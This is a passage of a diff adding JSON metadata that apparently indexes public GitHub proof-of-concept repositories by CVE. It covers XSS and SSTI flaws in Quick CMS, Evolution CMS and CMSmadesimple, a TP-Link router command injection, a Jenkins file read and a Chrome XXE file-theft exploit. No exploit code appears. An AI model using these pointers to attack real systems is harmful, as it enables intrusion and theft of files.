false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43341.json b/2023/CVE-2023-43341.json new file mode 100644 index 0000000000..21ec25bdc4 --- /dev/null +++ b/2023/CVE-2023-43341.json @@ -0,0 +1,33 @@ +[ + { + "id": 693001684, + "name": "CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-", + "full_name": "sromanhu\/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-", + "description": "Evolution CMS 3.2.3 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation\/connection process.", + "fork": false, + "created_at": "2023-09-18T06:39:38Z", + "updated_at": "2023-09-28T22:32:45Z", + "pushed_at": "2023-09-21T12:11:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43342.json b/2023/CVE-2023-43342.json new file mode 100644 index 0000000000..7d85794c92 --- /dev/null +++ b/2023/CVE-2023-43342.json @@ -0,0 +1,33 @@ +[ + { + "id": 693029467, + "name": "CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend", + "full_name": "sromanhu\/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend", + "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Frontend- Pages in the Languages Menu.", + "fork": false, + "created_at": "2023-09-18T07:51:26Z", + "updated_at": "2023-09-28T22:33:06Z", + "pushed_at": "2023-09-21T12:05:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43343.json b/2023/CVE-2023-43343.json new file mode 100644 index 0000000000..e7eb8b536f --- /dev/null +++ b/2023/CVE-2023-43343.json @@ -0,0 +1,33 @@ +[ + { + "id": 693015649, + "name": "CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files", + "full_name": "sromanhu\/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files", + "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Files - Description in the Pages Menu.", + "fork": false, + "created_at": "2023-09-18T07:16:18Z", + "updated_at": "2023-09-28T22:33:23Z", + "pushed_at": "2023-09-21T12:08:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43344.json b/2023/CVE-2023-43344.json new file mode 100644 index 0000000000..ccda939ad1 --- /dev/null +++ b/2023/CVE-2023-43344.json @@ -0,0 +1,33 @@ +[ + { + "id": 693027301, + "name": "CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description", + "full_name": "sromanhu\/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description", + "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the SEO- Meta description in the Pages Menu.", + "fork": false, + "created_at": "2023-09-18T07:46:02Z", + "updated_at": "2023-09-28T22:33:43Z", + "pushed_at": "2023-09-21T12:07:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43345.json b/2023/CVE-2023-43345.json new file mode 100644 index 0000000000..95693857ab --- /dev/null +++ b/2023/CVE-2023-43345.json @@ -0,0 +1,33 @@ +[ + { + "id": 693025701, + "name": "CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content", + "full_name": "sromanhu\/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content", + "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Content- Name in the Pages Menu.", + "fork": false, + "created_at": "2023-09-18T07:41:33Z", + "updated_at": "2023-09-28T22:34:01Z", + "pushed_at": "2023-09-21T12:07:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43346.json b/2023/CVE-2023-43346.json new file mode 100644 index 0000000000..02d9076f34 --- /dev/null +++ b/2023/CVE-2023-43346.json @@ -0,0 +1,33 @@ +[ + { + "id": 693030903, + "name": "CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend", + "full_name": "sromanhu\/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend", + "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Backend- Dashboard in the Languages Menu.", + "fork": false, + "created_at": "2023-09-18T07:55:10Z", + "updated_at": "2023-09-28T22:34:19Z", + "pushed_at": "2023-09-21T12:06:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43352.json b/2023/CVE-2023-43352.json new file mode 100644 index 0000000000..d9a05c1cb3 --- /dev/null +++ b/2023/CVE-2023-43352.json @@ -0,0 +1,33 @@ +[ + { + "id": 692736626, + "name": "CVE-2023-43352-CMSmadesimple-SSTI--Content", + "full_name": "sromanhu\/CVE-2023-43352-CMSmadesimple-SSTI--Content", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43352-CMSmadesimple-SSTI--Content", + "description": "SSTI vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to use native template syntax to inject a malicious payload into a template, which is then executed server-side", + "fork": false, + "created_at": "2023-09-17T12:35:39Z", + "updated_at": "2023-09-28T22:34:41Z", + "pushed_at": "2023-09-21T12:18:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43353.json b/2023/CVE-2023-43353.json new file mode 100644 index 0000000000..5817357a90 --- /dev/null +++ b/2023/CVE-2023-43353.json @@ -0,0 +1,33 @@ +[ + { + "id": 692732972, + "name": "CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra", + "full_name": "sromanhu\/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Extrain the Content - News Menu.", + "fork": false, + "created_at": "2023-09-17T12:21:12Z", + "updated_at": "2023-09-28T22:34:59Z", + "pushed_at": "2023-09-21T12:23:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43354.json b/2023/CVE-2023-43354.json new file mode 100644 index 0000000000..75496684f0 --- /dev/null +++ b/2023/CVE-2023-43354.json @@ -0,0 +1,33 @@ +[ + { + "id": 692730333, + "name": "CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension", + "full_name": "sromanhu\/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profile in the MicroTIny Menu.", + "fork": false, + "created_at": "2023-09-17T12:10:54Z", + "updated_at": "2023-09-28T22:35:16Z", + "pushed_at": "2023-09-21T12:24:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43355.json b/2023/CVE-2023-43355.json new file mode 100644 index 0000000000..3217556010 --- /dev/null +++ b/2023/CVE-2023-43355.json @@ -0,0 +1,33 @@ +[ + { + "id": 692734818, + "name": "CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user", + "full_name": "sromanhu\/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the password and password again in the My Preferences - Add user", + "fork": false, + "created_at": "2023-09-17T12:28:23Z", + "updated_at": "2023-09-28T22:35:45Z", + "pushed_at": "2023-09-21T12:19:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43356.json b/2023/CVE-2023-43356.json new file mode 100644 index 0000000000..1f286995d1 --- /dev/null +++ b/2023/CVE-2023-43356.json @@ -0,0 +1,33 @@ +[ + { + "id": 692725247, + "name": "CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings", + "full_name": "sromanhu\/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata in the Settings- Global Settings Menu.", + "fork": false, + "created_at": "2023-09-17T11:50:00Z", + "updated_at": "2023-09-28T22:36:00Z", + "pushed_at": "2023-09-21T12:26:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43357.json b/2023/CVE-2023-43357.json new file mode 100644 index 0000000000..71d82e745e --- /dev/null +++ b/2023/CVE-2023-43357.json @@ -0,0 +1,33 @@ +[ + { + "id": 692734079, + "name": "CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut", + "full_name": "sromanhu\/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title in the My Preferences - Manage Shortcuts", + "fork": false, + "created_at": "2023-09-17T12:25:24Z", + "updated_at": "2023-09-28T22:36:24Z", + "pushed_at": "2023-09-21T12:20:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43358.json b/2023/CVE-2023-43358.json new file mode 100644 index 0000000000..8e886ada7a --- /dev/null +++ b/2023/CVE-2023-43358.json @@ -0,0 +1,33 @@ +[ + { + "id": 692732099, + "name": "CVE-2023-43358-CMSmadesimple-Stored-XSS---News", + "full_name": "sromanhu\/CVE-2023-43358-CMSmadesimple-Stored-XSS---News", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43358-CMSmadesimple-Stored-XSS---News", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title in the Content - News Menu.", + "fork": false, + "created_at": "2023-09-17T12:17:49Z", + "updated_at": "2023-09-28T22:36:39Z", + "pushed_at": "2023-09-21T12:23:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43359.json b/2023/CVE-2023-43359.json new file mode 100644 index 0000000000..7dc9f1a986 --- /dev/null +++ b/2023/CVE-2023-43359.json @@ -0,0 +1,33 @@ +[ + { + "id": 692727411, + "name": "CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager", + "full_name": "sromanhu\/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to Page Specific Metadata and Smarty data in the Content Manager Menu.", + "fork": false, + "created_at": "2023-09-17T11:58:54Z", + "updated_at": "2023-09-28T22:36:55Z", + "pushed_at": "2023-09-21T12:26:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43360.json b/2023/CVE-2023-43360.json new file mode 100644 index 0000000000..4d61d2313c --- /dev/null +++ b/2023/CVE-2023-43360.json @@ -0,0 +1,33 @@ +[ + { + "id": 692729326, + "name": "CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension", + "full_name": "sromanhu\/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Top Directory in the File Picker Menu.", + "fork": false, + "created_at": "2023-09-17T12:06:56Z", + "updated_at": "2023-09-28T22:37:11Z", + "pushed_at": "2023-09-21T12:25:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43364.json b/2023/CVE-2023-43364.json new file mode 100644 index 0000000000..76f3c79eec --- /dev/null +++ b/2023/CVE-2023-43364.json @@ -0,0 +1,33 @@ +[ + { + "id": 792126842, + "name": "CVE-2023-43364-Exploit-CVE", + "full_name": "libertycityhacker\/CVE-2023-43364-Exploit-CVE", + "owner": { + "login": "libertycityhacker", + "id": 168156205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168156205?v=4", + "html_url": "https:\/\/github.com\/libertycityhacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libertycityhacker\/CVE-2023-43364-Exploit-CVE", + "description": null, + "fork": false, + "created_at": "2024-04-26T03:09:09Z", + "updated_at": "2024-04-26T03:12:27Z", + "pushed_at": "2024-04-26T03:12:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43481.json b/2023/CVE-2023-43481.json new file mode 100644 index 0000000000..1499b8d915 --- /dev/null +++ b/2023/CVE-2023-43481.json @@ -0,0 +1,35 @@ +[ + { + "id": 690844082, + "name": "com.tcl.browser", + "full_name": "actuator\/com.tcl.browser", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.tcl.browser", + "description": "CVE-2023-43481 ", + "fork": false, + "created_at": "2023-09-13T02:03:34Z", + "updated_at": "2023-12-28T05:18:57Z", + "pushed_at": "2024-04-13T01:51:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-43481" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43482.json b/2023/CVE-2023-43482.json new file mode 100644 index 0000000000..f5a842999a --- /dev/null +++ b/2023/CVE-2023-43482.json @@ -0,0 +1,33 @@ +[ + { + "id": 779866606, + "name": "CVE-2023-43482", + "full_name": "Mr-xn\/CVE-2023-43482", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2023-43482", + "description": "TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Command injection Vulnerability", + "fork": false, + "created_at": "2024-03-31T02:04:34Z", + "updated_at": "2024-06-21T00:12:16Z", + "pushed_at": "2024-03-31T02:07:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43494.json b/2023/CVE-2023-43494.json new file mode 100644 index 0000000000..62e85281ea --- /dev/null +++ b/2023/CVE-2023-43494.json @@ -0,0 +1,33 @@ +[ + { + "id": 845711489, + "name": "CVE-2023-43494", + "full_name": "mqxmm\/CVE-2023-43494", + "owner": { + "login": "mqxmm", + "id": 79595418, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79595418?v=4", + "html_url": "https:\/\/github.com\/mqxmm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mqxmm\/CVE-2023-43494", + "description": "Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) File Read", + "fork": false, + "created_at": "2024-08-21T19:26:09Z", + "updated_at": "2024-08-21T19:33:22Z", + "pushed_at": "2024-08-21T19:33:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4357.json b/2023/CVE-2023-4357.json new file mode 100644 index 0000000000..1cae0cdce3 --- /dev/null +++ b/2023/CVE-2023-4357.json @@ -0,0 +1,221 @@ +[ + { + "id": 719987092, + "name": "CVE-2023-4357-Chrome-XXE", + "full_name": "xcanwin\/CVE-2023-4357-Chrome-XXE", + "owner": { + "login": "xcanwin", + "id": 14187349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14187349?v=4", + "html_url": "https:\/\/github.com\/xcanwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xcanwin\/CVE-2023-4357-Chrome-XXE", + "description": "[漏洞复现] 全球首款单文件利用 CVE-2023-4357 Chrome XXE 漏洞 EXP, 实现对访客者本地文件窃取. Chrome XXE vulnerability EXP, allowing attackers to obtain local files of visitors.", + "fork": false, + "created_at": "2023-11-17T10:32:31Z", + "updated_at": "2024-11-22T06:25:41Z", + "pushed_at": "2023-11-21T10:45:58Z", + "stargazers_count": 200, + "watchers_count": 200, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-4357" + ], + "visibility": "public", + "forks": 34, + "watchers": 200, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 720888487, + "name": "CVE-2023-4357-APT-Style-exploitation", + "full_name": "OgulcanUnveren\/CVE-2023-4357-APT-Style-exploitation", + "owner": { + "login": "OgulcanUnveren", + "id": 112496046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112496046?v=4", + "html_url": "https:\/\/github.com\/OgulcanUnveren", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OgulcanUnveren\/CVE-2023-4357-APT-Style-exploitation", + "description": "Apt style exploitation of Chrome 0day CVE-2023-4357", + "fork": false, + "created_at": "2023-11-19T22:20:10Z", + "updated_at": "2024-11-15T16:57:30Z", + "pushed_at": "2023-11-20T01:02:44Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 43, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 721463764, + "name": "CVE-2023-4357-APT-Style-exploitation", + "full_name": "passwa11\/CVE-2023-4357-APT-Style-exploitation", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/CVE-2023-4357-APT-Style-exploitation", + "description": null, + "fork": false, + "created_at": "2023-11-21T05:39:15Z", + "updated_at": "2023-11-21T05:39:35Z", + "pushed_at": "2023-11-21T05:39:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725033535, + "name": "chrome-CVE-2023-4357", + "full_name": "sunu11\/chrome-CVE-2023-4357", + "owner": { + "login": "sunu11", + "id": 23350775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23350775?v=4", + "html_url": "https:\/\/github.com\/sunu11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunu11\/chrome-CVE-2023-4357", + "description": "poc", + "fork": false, + "created_at": "2023-11-29T09:52:36Z", + "updated_at": "2024-08-04T14:36:25Z", + "pushed_at": "2023-11-29T09:57:16Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 740847452, + "name": "CVE-2023-4357", + "full_name": "WinnieZy\/CVE-2023-4357", + "owner": { + "login": "WinnieZy", + "id": 15833215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15833215?v=4", + "html_url": "https:\/\/github.com\/WinnieZy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WinnieZy\/CVE-2023-4357", + "description": null, + "fork": false, + "created_at": "2024-01-09T07:31:29Z", + "updated_at": "2024-08-05T09:02:17Z", + "pushed_at": "2024-01-09T07:56:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773285621, + "name": "CVE-2023-4357-Exploitation", + "full_name": "lon5948\/CVE-2023-4357-Exploitation", + "owner": { + "login": "lon5948", + "id": 90599149, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90599149?v=4", + "html_url": "https:\/\/github.com\/lon5948", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lon5948\/CVE-2023-4357-Exploitation", + "description": "Network Security Project", + "fork": false, + "created_at": "2024-03-17T08:48:19Z", + "updated_at": "2024-08-05T09:04:59Z", + "pushed_at": "2024-04-13T16:49:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817801754, + "name": "CVE-2023-4357", + "full_name": "CamillaFranceschini\/CVE-2023-4357", + "owner": { + "login": 